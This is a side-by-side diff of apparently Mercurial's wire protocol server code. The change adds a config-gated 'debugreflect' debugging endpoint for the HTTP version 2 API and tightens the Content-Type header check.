163 Returns a bool indicating if the request was serviced. If set, the caller
163 should stop processing the request, as a response has already been issued.
164 should stop processing the request, as a response has already been issued.
164 """
165 """
165 # Avoid cycle involving hg module.
166 # Avoid cycle involving hg module.
166 from .hgweb import common as hgwebcommon
167 from .hgweb import common as hgwebcommon
167
168
168 repo = rctx.repo
169 repo = rctx.repo
169
170
170 # HTTP version 1 wire protocol requests are denoted by a "cmd" query
171 # HTTP version 1 wire protocol requests are denoted by a "cmd" query
171 # string parameter. If it isn't present, this isn't a wire protocol
172 # string parameter. If it isn't present, this isn't a wire protocol
172 # request.
173 # request.
173 if 'cmd' not in req.qsparams:
174 if 'cmd' not in req.qsparams:
174 return False
175 return False
175
176
176 cmd = req.qsparams['cmd']
177 cmd = req.qsparams['cmd']
177
178
178 # The "cmd" request parameter is used by both the wire protocol and hgweb.
179 # The "cmd" request parameter is used by both the wire protocol and hgweb.
179 # While not all wire protocol commands are available for all transports,
180 # While not all wire protocol commands are available for all transports,
180 # if we see a "cmd" value that resembles a known wire protocol command, we
181 # if we see a "cmd" value that resembles a known wire protocol command, we
181 # route it to a protocol handler. This is better than routing possible
182 # route it to a protocol handler. This is better than routing possible
182 # wire protocol requests to hgweb because it prevents hgweb from using
183 # wire protocol requests to hgweb because it prevents hgweb from using
183 # known wire protocol commands and it is less confusing for machine
184 # known wire protocol commands and it is less confusing for machine
184 # clients.
185 # clients.
185 if not iscmd(cmd):
186 if not iscmd(cmd):
186 return False
187 return False
187
188
188 # The "cmd" query string argument is only valid on the root path of the
189 # The "cmd" query string argument is only valid on the root path of the
189 # repo. e.g. ``/?cmd=foo``, ``/repo?cmd=foo``. URL paths within the repo
190 # repo. e.g. ``/?cmd=foo``, ``/repo?cmd=foo``. URL paths within the repo
190 # like ``/blah?cmd=foo`` are not allowed. So don't recognize the request
191 # like ``/blah?cmd=foo`` are not allowed. So don't recognize the request
191 # in this case. We send an HTTP 404 for backwards compatibility reasons.
192 # in this case. We send an HTTP 404 for backwards compatibility reasons.
192 if req.dispatchpath:
193 if req.dispatchpath:
193 res.status = hgwebcommon.statusmessage(404)
194 res.status = hgwebcommon.statusmessage(404)
194 res.headers['Content-Type'] = HGTYPE
195 res.headers['Content-Type'] = HGTYPE
195 # TODO This is not a good response to issue for this request. This
196 # TODO This is not a good response to issue for this request. This
196 # is mostly for BC for now.
197 # is mostly for BC for now.
197 res.setbodybytes('0\n%s\n' % b'Not Found')
198 res.setbodybytes('0\n%s\n' % b'Not Found')
198 return True
199 return True
199
200
200 proto = httpv1protocolhandler(req, repo.ui,
201 proto = httpv1protocolhandler(req, repo.ui,
201 lambda perm: checkperm(rctx, req, perm))
202 lambda perm: checkperm(rctx, req, perm))
202
203
203 # The permissions checker should be the only thing that can raise an
204 # The permissions checker should be the only thing that can raise an
204 # ErrorResponse. It is kind of a layer violation to catch an hgweb
205 # ErrorResponse. It is kind of a layer violation to catch an hgweb
205 # exception here. So consider refactoring into a exception type that
206 # exception here. So consider refactoring into a exception type that
206 # is associated with the wire protocol.
207 # is associated with the wire protocol.
207 try:
208 try:
208 _callhttp(repo, req, res, proto, cmd)
209 _callhttp(repo, req, res, proto, cmd)
209 except hgwebcommon.ErrorResponse as e:
210 except hgwebcommon.ErrorResponse as e:
210 for k, v in e.headers:
211 for k, v in e.headers:
211 res.headers[k] = v
212 res.headers[k] = v
212 res.status = hgwebcommon.statusmessage(e.code, pycompat.bytestr(e))
213 res.status = hgwebcommon.statusmessage(e.code, pycompat.bytestr(e))
213 # TODO This response body assumes the failed command was
214 # TODO This response body assumes the failed command was
214 # "unbundle." That assumption is not always valid.
215 # "unbundle." That assumption is not always valid.
215 res.setbodybytes('0\n%s\n' % pycompat.bytestr(e))
216 res.setbodybytes('0\n%s\n' % pycompat.bytestr(e))
216
217
217 return True
218 return True
218
219
219 def handlewsgiapirequest(rctx, req, res, checkperm):
220 def handlewsgiapirequest(rctx, req, res, checkperm):
220 """Handle requests to /api/*."""
221 """Handle requests to /api/*."""
221 assert req.dispatchparts[0] == b'api'
222 assert req.dispatchparts[0] == b'api'
222
223
223 repo = rctx.repo
224 repo = rctx.repo
224
225
225 # This whole URL space is experimental for now. But we want to
226 # This whole URL space is experimental for now. But we want to
226 # reserve the URL space. So, 404 all URLs if the feature isn't enabled.
227 # reserve the URL space. So, 404 all URLs if the feature isn't enabled.
227 if not repo.ui.configbool('experimental', 'web.apiserver'):
228 if not repo.ui.configbool('experimental', 'web.apiserver'):
228 res.status = b'404 Not Found'
229 res.status = b'404 Not Found'
229 res.headers[b'Content-Type'] = b'text/plain'
230 res.headers[b'Content-Type'] = b'text/plain'
230 res.setbodybytes(_('Experimental API server endpoint not enabled'))
231 res.setbodybytes(_('Experimental API server endpoint not enabled'))
231 return
232 return
232
233
233 # The URL space is /api/<protocol>/*. The structure of URLs under varies
234 # The URL space is /api/<protocol>/*. The structure of URLs under varies
234 # by <protocol>.
235 # by <protocol>.
235
236
236 # Registered APIs are made available via config options of the name of
237 # Registered APIs are made available via config options of the name of
237 # the protocol.
238 # the protocol.
238 availableapis = set()
239 availableapis = set()
239 for k, v in API_HANDLERS.items():
240 for k, v in API_HANDLERS.items():
240 section, option = v['config']
241 section, option = v['config']
241 if repo.ui.configbool(section, option):
242 if repo.ui.configbool(section, option):
242 availableapis.add(k)
243 availableapis.add(k)
243
244
244 # Requests to /api/ list available APIs.
245 # Requests to /api/ list available APIs.
245 if req.dispatchparts == [b'api']:
246 if req.dispatchparts == [b'api']:
246 res.status = b'200 OK'
247 res.status = b'200 OK'
247 res.headers[b'Content-Type'] = b'text/plain'
248 res.headers[b'Content-Type'] = b'text/plain'
248 lines = [_('APIs can be accessed at /api/<name>, where <name> can be '
249 lines = [_('APIs can be accessed at /api/<name>, where <name> can be '
249 'one of the following:\n')]
250 'one of the following:\n')]
250 if availableapis:
251 if availableapis:
251 lines.extend(sorted(availableapis))
252 lines.extend(sorted(availableapis))
252 else:
253 else:
253 lines.append(_('(no available APIs)\n'))
254 lines.append(_('(no available APIs)\n'))
254 res.setbodybytes(b'\n'.join(lines))
255 res.setbodybytes(b'\n'.join(lines))
255 return
256 return
256
257
257 proto = req.dispatchparts[1]
258 proto = req.dispatchparts[1]
258
259
259 if proto not in API_HANDLERS:
260 if proto not in API_HANDLERS:
260 res.status = b'404 Not Found'
261 res.status = b'404 Not Found'
261 res.headers[b'Content-Type'] = b'text/plain'
262 res.headers[b'Content-Type'] = b'text/plain'
262 res.setbodybytes(_('Unknown API: %s\nKnown APIs: %s') % (
263 res.setbodybytes(_('Unknown API: %s\nKnown APIs: %s') % (
263 proto, b', '.join(sorted(availableapis))))
264 proto, b', '.join(sorted(availableapis))))
264 return
265 return
265
266
266 if proto not in availableapis:
267 if proto not in availableapis:
267 res.status = b'404 Not Found'
268 res.status = b'404 Not Found'
268 res.headers[b'Content-Type'] = b'text/plain'
269 res.headers[b'Content-Type'] = b'text/plain'
269 res.setbodybytes(_('API %s not enabled\n') % proto)
270 res.setbodybytes(_('API %s not enabled\n') % proto)
270 return
271 return
271
272
272 API_HANDLERS[proto]['handler'](rctx, req, res, checkperm,
273 API_HANDLERS[proto]['handler'](rctx, req, res, checkperm,
273 req.dispatchparts[2:])
274 req.dispatchparts[2:])
274
275
275 def _handlehttpv2request(rctx, req, res, checkperm, urlparts):
276 def _handlehttpv2request(rctx, req, res, checkperm, urlparts):
276 from .hgweb import common as hgwebcommon
277 from .hgweb import common as hgwebcommon
277
278
278 # URL space looks like: <permissions>/<command>, where <permission> can
279 # URL space looks like: <permissions>/<command>, where <permission> can
279 # be ``ro`` or ``rw`` to signal read-only or read-write, respectively.
280 # be ``ro`` or ``rw`` to signal read-only or read-write, respectively.
280
281
281 # Root URL does nothing meaningful... yet.
282 # Root URL does nothing meaningful... yet.
282 if not urlparts:
283 if not urlparts:
283 res.status = b'200 OK'
284 res.status = b'200 OK'
284 res.headers[b'Content-Type'] = b'text/plain'
285 res.headers[b'Content-Type'] = b'text/plain'
285 res.setbodybytes(_('HTTP version 2 API handler'))
286 res.setbodybytes(_('HTTP version 2 API handler'))
286 return
287 return
287
288
288 if len(urlparts) == 1:
289 if len(urlparts) == 1:
289 res.status = b'404 Not Found'
290 res.status = b'404 Not Found'
290 res.headers[b'Content-Type'] = b'text/plain'
291 res.headers[b'Content-Type'] = b'text/plain'
291 res.setbodybytes(_('do not know how to process %s\n') %
292 res.setbodybytes(_('do not know how to process %s\n') %
292 req.dispatchpath)
293 req.dispatchpath)
293 return
294 return
294
295
295 permission, command = urlparts[0:2]
296 permission, command = urlparts[0:2]
296
297
297 if permission not in (b'ro', b'rw'):
298 if permission not in (b'ro', b'rw'):
298 res.status = b'404 Not Found'
299 res.status = b'404 Not Found'
299 res.headers[b'Content-Type'] = b'text/plain'
300 res.headers[b'Content-Type'] = b'text/plain'
300 res.setbodybytes(_('unknown permission: %s') % permission)
301 res.setbodybytes(_('unknown permission: %s') % permission)
301 return
302 return
302
303
303 if req.method != 'POST':
304 if req.method != 'POST':
304 res.status = b'405 Method Not Allowed'
305 res.status = b'405 Method Not Allowed'
305 res.headers[b'Allow'] = b'POST'
306 res.headers[b'Allow'] = b'POST'
306 res.setbodybytes(_('commands require POST requests'))
307 res.setbodybytes(_('commands require POST requests'))
307 return
308 return
308
309
309 # At some point we'll want to use our own API instead of recycling the
310 # At some point we'll want to use our own API instead of recycling the
310 # behavior of version 1 of the wire protocol...
311 # behavior of version 1 of the wire protocol...
311 # TODO return reasonable responses - not responses that overload the
312 # TODO return reasonable responses - not responses that overload the
312 # HTTP status line message for error reporting.
313 # HTTP status line message for error reporting.
313 try:
314 try:
314 checkperm(rctx, req, 'pull' if permission == b'ro' else 'push')
315 checkperm(rctx, req, 'pull' if permission == b'ro' else 'push')
315 except hgwebcommon.ErrorResponse as e:
316 except hgwebcommon.ErrorResponse as e:
316 res.status = hgwebcommon.statusmessage(e.code, pycompat.bytestr(e))
317 res.status = hgwebcommon.statusmessage(e.code, pycompat.bytestr(e))
317 for k, v in e.headers:
318 for k, v in e.headers:
318 res.headers[k] = v
319 res.headers[k] = v
319 res.setbodybytes('permission denied')
320 res.setbodybytes('permission denied')
320 return
321 return
321
322
323 # We have a special endpoint to reflect the request back at the client.
324 if command == b'debugreflect':
325 _processhttpv2reflectrequest(rctx.repo.ui, rctx.repo, req, res)
326 return
327
322 if command not in wireproto.commands:
328 if command not in wireproto.commands:
323 res.status = b'404 Not Found'
329 res.status = b'404 Not Found'
324 res.headers[b'Content-Type'] = b'text/plain'
330 res.headers[b'Content-Type'] = b'text/plain'
325 res.setbodybytes(_('unknown wire protocol command: %s\n') % command)
331 res.setbodybytes(_('unknown wire protocol command: %s\n') % command)
326 return
332 return
327
333
328 repo = rctx.repo
334 repo = rctx.repo
329 ui = repo.ui
335 ui = repo.ui
330
336
331 proto = httpv2protocolhandler(req, ui)
337 proto = httpv2protocolhandler(req, ui)
332
338
333 if not wireproto.commands.commandavailable(command, proto):
339 if not wireproto.commands.commandavailable(command, proto):
334 res.status = b'404 Not Found'
340 res.status = b'404 Not Found'
335 res.headers[b'Content-Type'] = b'text/plain'
341 res.headers[b'Content-Type'] = b'text/plain'
336 res.setbodybytes(_('invalid wire protocol command: %s') % command)
342 res.setbodybytes(_('invalid wire protocol command: %s') % command)
337 return
343 return
338
344
339 if req.headers.get(b'Accept') != FRAMINGTYPE:
345 if req.headers.get(b'Accept') != FRAMINGTYPE:
340 res.status = b'406 Not Acceptable'
346 res.status = b'406 Not Acceptable'
341 res.headers[b'Content-Type'] = b'text/plain'
347 res.headers[b'Content-Type'] = b'text/plain'
342 res.setbodybytes(_('client MUST specify Accept header with value: %s\n')
348 res.setbodybytes(_('client MUST specify Accept header with value: %s\n')
343 % FRAMINGTYPE)
349 % FRAMINGTYPE)
344 return
350 return
345
351
346 if (b'Content-Type' in req.headers
352 if req.headers.get(b'Content-Type') != FRAMINGTYPE:
347 and req.headers[b'Content-Type'] != FRAMINGTYPE):
348 res.status = b'415 Unsupported Media Type'
353 res.status = b'415 Unsupported Media Type'
349 # TODO we should send a response with appropriate media type,
354 # TODO we should send a response with appropriate media type,
350 # since client does Accept it.
355 # since client does Accept it.
351 res.headers[b'Content-Type'] = b'text/plain'
356 res.headers[b'Content-Type'] = b'text/plain'
352 res.setbodybytes(_('client MUST send Content-Type header with '
357 res.setbodybytes(_('client MUST send Content-Type header with '
353 'value: %s\n') % FRAMINGTYPE)
358 'value: %s\n') % FRAMINGTYPE)
354 return
359 return
355
360
356 # We don't do anything meaningful yet.
361 # We don't do anything meaningful yet.
357 res.status = b'200 OK'
362 res.status = b'200 OK'
358 res.headers[b'Content-Type'] = b'text/plain'
363 res.headers[b'Content-Type'] = b'text/plain'
359 res.setbodybytes(b'/'.join(urlparts) + b'\n')
364 res.setbodybytes(b'/'.join(urlparts) + b'\n')
360
365
366 def _processhttpv2reflectrequest(ui, repo, req, res):
367 """Reads unified frame protocol request and dumps out state to client.
368
369 This special endpoint can be used to help debug the wire protocol.
370
371 Instead of routing the request through the normal dispatch mechanism,
372 we instead read all frames, decode them, and feed them into our state
373 tracker. We then dump the log of all that activity back out to the
374 client.
375 """
376 import json
377
378 # Reflection APIs have a history of being abused, accidentally disclosing
379 # sensitive data, etc. So we have a config knob.
380 if not ui.configbool('experimental', 'web.api.debugreflect'):
381 res.status = b'404 Not Found'
382 res.headers[b'Content-Type'] = b'text/plain'
383 res.setbodybytes(_('debugreflect service not available'))
384 return
385
386 # We assume we have a unified framing protocol request body.
387
388 reactor = wireprotoframing.serverreactor()
389 states = []
390
391 while True:
392 frame = wireprotoframing.readframe(req.bodyfh)
393
394 if not frame:
395 states.append(b'received: <no frame>')
396 break
397
398 frametype, frameflags, payload = frame
399 states.append(b'received: %d %d %s' % (frametype, frameflags, payload))
400
401 action, meta = reactor.onframerecv(frametype, frameflags, payload)
402 states.append(json.dumps((action, meta), sort_keys=True,
403 separators=(', ', ': ')))
404
405 res.status = b'200 OK'
406 res.headers[b'Content-Type'] = b'text/plain'
407 res.setbodybytes(b'\n'.join(states))
408
361 # Maps API name to metadata so custom API can be registered.
409 # Maps API name to metadata so custom API can be registered.
362 API_HANDLERS = {
410 API_HANDLERS = {
363 HTTPV2: {
411 HTTPV2: {
364 'config': ('experimental', 'web.api.http-v2'),
412 'config': ('experimental', 'web.api.http-v2'),
365 'handler': _handlehttpv2request,
413 'handler': _handlehttpv2request,
366 },
414 },
367 }
415 }
368
416
369 class httpv2protocolhandler(wireprototypes.baseprotocolhandler):
417 class httpv2protocolhandler(wireprototypes.baseprotocolhandler):
370 def __init__(self, req, ui):
418 def __init__(self, req, ui):
371 self._req = req
419 self._req = req
372 self._ui = ui
420 self._ui = ui
373
421
374 @property
422 @property
375 def name(self):
423 def name(self):
376 return HTTPV2
424 return HTTPV2
377
425
378 def getargs(self, args):
426 def getargs(self, args):
379 raise NotImplementedError
427 raise NotImplementedError
380
428
381 def forwardpayload(self, fp):
429 def forwardpayload(self, fp):
382 raise NotImplementedError
430 raise NotImplementedError
383
431
384 @contextlib.contextmanager
432 @contextlib.contextmanager
385 def mayberedirectstdio(self):
433 def mayberedirectstdio(self):
386 raise NotImplementedError
434 raise NotImplementedError
387
435
388 def client(self):
436 def client(self):
389 raise NotImplementedError
437 raise NotImplementedError
390
438
391 def addcapabilities(self, repo, caps):
439 def addcapabilities(self, repo, caps):
392 raise NotImplementedError
440 raise NotImplementedError
393
441
394 def checkperm(self, perm):
442 def checkperm(self, perm):
395 raise NotImplementedError
443 raise NotImplementedError
396
444
397 def _httpresponsetype(ui, req, prefer_uncompressed):
445 def _httpresponsetype(ui, req, prefer_uncompressed):
398 """Determine the appropriate response type and compression settings.
446 """Determine the appropriate response type and compression settings.
399
447
400 Returns a tuple of (mediatype, compengine, engineopts).
448 Returns a tuple of (mediatype, compengine, engineopts).
401 """
449 """
402 # Determine the response media type and compression engine based
450 # Determine the response media type and compression engine based
403 # on the request parameters.
451 # on the request parameters.
404 protocaps = decodevaluefromheaders(req, 'X-HgProto').split(' ')
452 protocaps = decodevaluefromheaders(req, 'X-HgProto').split(' ')
405
453
406 if '0.2' in protocaps:
454 if '0.2' in protocaps:
407 # All clients are expected to support uncompressed data.
455 # All clients are expected to support uncompressed data.
408 if prefer_uncompressed:
456 if prefer_uncompressed:
409 return HGTYPE2, util._noopengine(), {}
457 return HGTYPE2, util._noopengine(), {}
410
458
411 # Default as defined by wire protocol spec.
459 # Default as defined by wire protocol spec.
412 compformats = ['zlib', 'none']
460 compformats = ['zlib', 'none']
413 for cap in protocaps:
461 for cap in protocaps:
414 if cap.startswith('comp='):
462 if cap.startswith('comp='):
415 compformats = cap[5:].split(',')
463 compformats = cap[5:].split(',')
416 break
464 break
417
465
418 # Now find an agreed upon compression format.
466 # Now find an agreed upon compression format.
419 for engine in wireproto.supportedcompengines(ui, util.SERVERROLE):
467 for engine in wireproto.supportedcompengines(ui, util.SERVERROLE):
420 if engine.wireprotosupport().name in compformats:
468 if engine.wireprotosupport().name in compformats:
421 opts = {}
469 opts = {}
422 level = ui.configint('server', '%slevel' % engine.name())
470 level = ui.configint('server', '%slevel' % engine.name())
423 if level is not None:
471 if level is not None:
424 opts['level'] = level
472 opts['level'] = level
425
473
426 return HGTYPE2, engine, opts
474 return HGTYPE2, engine, opts
427
475
428 # No mutually supported compression format. Fall back to the
476 # No mutually supported compression format. Fall back to the
429 # legacy protocol.
477 # legacy protocol.
430
478
431 # Don't allow untrusted settings because disabling compression or
479 # Don't allow untrusted settings because disabling compression or
432 # setting a very high compression level could lead to flooding
480 # setting a very high compression level could lead to flooding
433 # the server's network or CPU.
481 # the server's network or CPU.
434 opts = {'level': ui.configint('server', 'zliblevel')}
482 opts = {'level': ui.configint('server', 'zliblevel')}
435 return HGTYPE, util.compengines['zlib'], opts
483 return HGTYPE, util.compengines['zlib'], opts
436
484
437 def _callhttp(repo, req, res, proto, cmd):
485 def _callhttp(repo, req, res, proto, cmd):
438 # Avoid cycle involving hg module.
486 # Avoid cycle involving hg module.
439 from .hgweb import common as hgwebcommon
487 from .hgweb import common as hgwebcommon
440
488
441 def genversion2(gen, engine, engineopts):
489 def genversion2(gen, engine, engineopts):
442 # application/mercurial-0.2 always sends a payload header
490 # application/mercurial-0.2 always sends a payload header
443 # identifying the compression engine.
491 # identifying the compression engine.
444 name = engine.wireprotosupport().name
492 name = engine.wireprotosupport().name
445 assert 0 < len(name) < 256
493 assert 0 < len(name) < 256
446 yield struct.pack('B', len(name))
494 yield struct.pack('B', len(name))
447 yield name
495 yield name
448
496
449 for chunk in gen:
497 for chunk in gen:
450 yield chunk
498 yield chunk
451
499
452 def setresponse(code, contenttype, bodybytes=None, bodygen=None):
500 def setresponse(code, contenttype, bodybytes=None, bodygen=None):
453 if code == HTTP_OK:
501 if code == HTTP_OK:
454 res.status = '200 Script output follows'
502 res.status = '200 Script output follows'
455 else:
503 else:
456 res.status = hgwebcommon.statusmessage(code)
504 res.status = hgwebcommon.statusmessage(code)
457
505
458 res.headers['Content-Type'] = contenttype
506 res.headers['Content-Type'] = contenttype
459
507
460 if bodybytes is not None:
508 if bodybytes is not None:
461 res.setbodybytes(bodybytes)
509 res.setbodybytes(bodybytes)
462 if bodygen is not None:
510 if bodygen is not None:
463 res.setbodygen(bodygen)
511 res.setbodygen(bodygen)
464
512
465 if not wireproto.commands.commandavailable(cmd, proto):
513 if not wireproto.commands.commandavailable(cmd, proto):
466 setresponse(HTTP_OK, HGERRTYPE,
514 setresponse(HTTP_OK, HGERRTYPE,
467 _('requested wire protocol command is not available over '
515 _('requested wire protocol command is not available over '
468 'HTTP'))
516 'HTTP'))
469 return
517 return
470
518
471 proto.checkperm(wireproto.commands[cmd].permission)
519 proto.checkperm(wireproto.commands[cmd].permission)
472
520
473 rsp = wireproto.dispatch(repo, proto, cmd)
521 rsp = wireproto.dispatch(repo, proto, cmd)
474
522
475 if isinstance(rsp, bytes):
523 if isinstance(rsp, bytes):
476 setresponse(HTTP_OK, HGTYPE, bodybytes=rsp)
524 setresponse(HTTP_OK, HGTYPE, bodybytes=rsp)
477 elif isinstance(rsp, wireprototypes.bytesresponse):
525 elif isinstance(rsp, wireprototypes.bytesresponse):
478 setresponse(HTTP_OK, HGTYPE, bodybytes=rsp.data)
526 setresponse(HTTP_OK, HGTYPE, bodybytes=rsp.data)
479 elif isinstance(rsp, wireprototypes.streamreslegacy):
527 elif isinstance(rsp, wireprototypes.streamreslegacy):
480 setresponse(HTTP_OK, HGTYPE, bodygen=rsp.gen)
528 setresponse(HTTP_OK, HGTYPE, bodygen=rsp.gen)
481 elif isinstance(rsp, wireprototypes.streamres):
529 elif isinstance(rsp, wireprototypes.streamres):
482 gen = rsp.gen
530 gen = rsp.gen
483
531
484 # This code for compression should not be streamres specific. It
532 # This code for compression should not be streamres specific. It
485 # is here because we only compress streamres at the moment.
533 # is here because we only compress streamres at the moment.
486 mediatype, engine, engineopts = _httpresponsetype(
534 mediatype, engine, engineopts = _httpresponsetype(
487 repo.ui, req, rsp.prefer_uncompressed)
535 repo.ui, req, rsp.prefer_uncompressed)
488 gen = engine.compressstream(gen, engineopts)
536 gen = engine.compressstream(gen, engineopts)
489
537
490 if mediatype == HGTYPE2:
538 if mediatype == HGTYPE2:
491 gen = genversion2(gen, engine, engineopts)
539 gen = genversion2(gen, engine, engineopts)
492
540
493 setresponse(HTTP_OK, mediatype, bodygen=gen)
541 setresponse(HTTP_OK, mediatype, bodygen=gen)
494 elif isinstance(rsp, wireprototypes.pushres):
542 elif isinstance(rsp, wireprototypes.pushres):
495 rsp = '%d\n%s' % (rsp.res, rsp.output)
543 rsp = '%d\n%s' % (rsp.res, rsp.output)
496 setresponse(HTTP_OK, HGTYPE, bodybytes=rsp)
544 setresponse(HTTP_OK, HGTYPE, bodybytes=rsp)
497 elif isinstance(rsp, wireprototypes.pusherr):
545 elif isinstance(rsp, wireprototypes.pusherr):
498 rsp = '0\n%s\n' % rsp.res
546 rsp = '0\n%s\n' % rsp.res
499 res.drain = True
547 res.drain = True
500 setresponse(HTTP_OK, HGTYPE, bodybytes=rsp)
548 setresponse(HTTP_OK, HGTYPE, bodybytes=rsp)
501 elif isinstance(rsp, wireprototypes.ooberror):
549 elif isinstance(rsp, wireprototypes.ooberror):
502 setresponse(HTTP_OK, HGERRTYPE, bodybytes=rsp.message)
550 setresponse(HTTP_OK, HGERRTYPE, bodybytes=rsp.message)
503 else:
551 else:
504 raise error.ProgrammingError('hgweb.protocol internal failure', rsp)
552 raise error.ProgrammingError('hgweb.protocol internal failure', rsp)
505
553
506 def _sshv1respondbytes(fout, value):
554 def _sshv1respondbytes(fout, value):
507 """Send a bytes response for protocol version 1."""
555 """Send a bytes response for protocol version 1."""
508 fout.write('%d\n' % len(value))
556 fout.write('%d\n' % len(value))
509 fout.write(value)
557 fout.write(value)
510 fout.flush()
558 fout.flush()
511
559
512 def _sshv1respondstream(fout, source):
560 def _sshv1respondstream(fout, source):
513 write = fout.write
561 write = fout.write
514 for chunk in source.gen:
562 for chunk in source.gen:
515 write(chunk)
563 write(chunk)
516 fout.flush()
564 fout.flush()
517
565
518 def _sshv1respondooberror(fout, ferr, rsp):
566 def _sshv1respondooberror(fout, ferr, rsp):
519 ferr.write(b'%s\n-\n' % rsp)
567 ferr.write(b'%s\n-\n' % rsp)
520 ferr.flush()
568 ferr.flush()
521 fout.write(b'\n')
569 fout.write(b'\n')
522 fout.flush()
570 fout.flush()
523
571
524 class sshv1protocolhandler(wireprototypes.baseprotocolhandler):
572 class sshv1protocolhandler(wireprototypes.baseprotocolhandler):
525 """Handler for requests services via version 1 of SSH protocol."""
573 """Handler for requests services via version 1 of SSH protocol."""
526 def __init__(self, ui, fin, fout):
574 def __init__(self, ui, fin, fout):
527 self._ui = ui
575 self._ui = ui
528 self._fin = fin
576 self._fin = fin
529 self._fout = fout
577 self._fout = fout
530
578
531 @property
579 @property
532 def name(self):
580 def name(self):
533 return wireprototypes.SSHV1
581 return wireprototypes.SSHV1
534
582
535 def getargs(self, args):
583 def getargs(self, args):
536 data = {}
584 data = {}
537 keys = args.split()
585 keys = args.split()
538 for n in xrange(len(keys)):
586 for n in xrange(len(keys)):
539 argline = self._fin.readline()[:-1]
587 argline = self._fin.readline()[:-1]
540 arg, l = argline.split()
588 arg, l = argline.split()
541 if arg not in keys:
589 if arg not in keys:
542 raise error.Abort(_("unexpected parameter %r") % arg)
590 raise error.Abort(_("unexpected parameter %r") % arg)
543 if arg == '*':
591 if arg == '*':
544 star = {}
592 star = {}
545 for k in xrange(int(l)):
593 for k in xrange(int(l)):
546 argline = self._fin.readline()[:-1]
594 argline = self._fin.readline()[:-1]
547 arg, l = argline.split()
595 arg, l = argline.split()
548 val = self._fin.read(int(l))
596 val = self._fin.read(int(l))
549 star[arg] = val
597 star[arg] = val
550 data['*'] = star
598 data['*'] = star
551 else:
599 else:
552 val = self._fin.read(int(l))
600 val = self._fin.read(int(l))
553 data[arg] = val
601 data[arg] = val
554 return [data[k] for k in keys]
602 return [data[k] for k in keys]
555
603
556 def forwardpayload(self, fpout):
604 def forwardpayload(self, fpout):
557 # We initially send an empty response. This tells the client it is
605 # We initially send an empty response. This tells the client it is
558 # OK to start sending data. If a client sees any other response, it
606 # OK to start sending data. If a client sees any other response, it
559 # interprets it as an error.
607 # interprets it as an error.
560 _sshv1respondbytes(self._fout, b'')
608 _sshv1respondbytes(self._fout, b'')
561
609
562 # The file is in the form:
610 # The file is in the form:
563 #
611 #
564 # <chunk size>\n<chunk>
612 # <chunk size>\n<chunk>
565 # ...
613 # ...
566 # 0\n
614 # 0\n
567 count = int(self._fin.readline())
615 count = int(self._fin.readline())
568 while count:
616 while count:
569 fpout.write(self._fin.read(count))
617 fpout.write(self._fin.read(count))
570 count = int(self._fin.readline())
618 count = int(self._fin.readline())
571
619
572 @contextlib.contextmanager
620 @contextlib.contextmanager
573 def mayberedirectstdio(self):
621 def mayberedirectstdio(self):
574 yield None
622 yield None
575
623
576 def client(self):
624 def client(self):
577 client = encoding.environ.get('SSH_CLIENT', '').split(' ', 1)[0]
625 client = encoding.environ.get('SSH_CLIENT', '').split(' ', 1)[0]
578 return 'remote:ssh:' + client
626 return 'remote:ssh:' + client
579
627
580 def addcapabilities(self, repo, caps):
628 def addcapabilities(self, repo, caps):
581 return caps
629 return caps
582
630
583 def checkperm(self, perm):
631 def checkperm(self, perm):
584 pass
632 pass
585
633
586 class sshv2protocolhandler(sshv1protocolhandler):
634 class sshv2protocolhandler(sshv1protocolhandler):
587 """Protocol handler for version 2 of the SSH protocol."""
635 """Protocol handler for version 2 of the SSH protocol."""
588
636
589 @property
637 @property
590 def name(self):
638 def name(self):
591 return wireprototypes.SSHV2
639 return wireprototypes.SSHV2
592
640
593 def _runsshserver(ui, repo, fin, fout, ev):
641 def _runsshserver(ui, repo, fin, fout, ev):
594 # This function operates like a state machine of sorts. The following
642 # This function operates like a state machine of sorts. The following
595 # states are defined:
643 # states are defined:
596 #
644 #
597 # protov1-serving
645 # protov1-serving
598 # Server is in protocol version 1 serving mode. Commands arrive on
646 # Server is in protocol version 1 serving mode. Commands arrive on
599 # new lines. These commands are processed in this state, one command
647 # new lines. These commands are processed in this state, one command
600 # after the other.
648 # after the other.
601 #
649 #
602 # protov2-serving
650 # protov2-serving
603 # Server is in protocol version 2 serving mode.
651 # Server is in protocol version 2 serving mode.
604 #
652 #
605 # upgrade-initial
653 # upgrade-initial
606 # The server is going to process an upgrade request.
654 # The server is going to process an upgrade request.
607 #
655 #
608 # upgrade-v2-filter-legacy-handshake
656 # upgrade-v2-filter-legacy-handshake
609 # The protocol is being upgraded to version 2. The server is expecting
657 # The protocol is being upgraded to version 2. The server is expecting
610 # the legacy handshake from version 1.
658 # the legacy handshake from version 1.
611 #
659 #
612 # upgrade-v2-finish
660 # upgrade-v2-finish
613 # The upgrade to version 2 of the protocol is imminent.
661 # The upgrade to version 2 of the protocol is imminent.
614 #
662 #
615 # shutdown
663 # shutdown
616 # The server is shutting down, possibly in reaction to a client event.
664 # The server is shutting down, possibly in reaction to a client event.
617 #
665 #
618 # And here are their transitions:
666 # And here are their transitions:
619 #
667 #
620 # protov1-serving -> shutdown
668 # protov1-serving -> shutdown
621 # When server receives an empty request or encounters another
669 # When server receives an empty request or encounters another
622 # error.
670 # error.
623 #
671 #
624 # protov1-serving -> upgrade-initial
672 # protov1-serving -> upgrade-initial
625 # An upgrade request line was seen.
673 # An upgrade request line was seen.
626 #
674 #
627 # upgrade-initial -> upgrade-v2-filter-legacy-handshake
675 # upgrade-initial -> upgrade-v2-filter-legacy-handshake
628 # Upgrade to version 2 in progress. Server is expecting to
676 # Upgrade to version 2 in progress. Server is expecting to
629 # process a legacy handshake.
677 # process a legacy handshake.
630 #
678 #
631 # upgrade-v2-filter-legacy-handshake -> shutdown
679 # upgrade-v2-filter-legacy-handshake -> shutdown
632 # Client did not fulfill upgrade handshake requirements.
680 # Client did not fulfill upgrade handshake requirements.
633 #
681 #
634 # upgrade-v2-filter-legacy-handshake -> upgrade-v2-finish
682 # upgrade-v2-filter-legacy-handshake -> upgrade-v2-finish
635 # Client fulfilled version 2 upgrade requirements. Finishing that
683 # Client fulfilled version 2 upgrade requirements. Finishing that
636 # upgrade.
684 # upgrade.
637 #
685 #
638 # upgrade-v2-finish -> protov2-serving
686 # upgrade-v2-finish -> protov2-serving
639 # Protocol upgrade to version 2 complete. Server can now speak protocol
687 # Protocol upgrade to version 2 complete. Server can now speak protocol
640 # version 2.
688 # version 2.
641 #
689 #
642 # protov2-serving -> protov1-serving
690 # protov2-serving -> protov1-serving
643 # Ths happens by default since protocol version 2 is the same as
691 # Ths happens by default since protocol version 2 is the same as
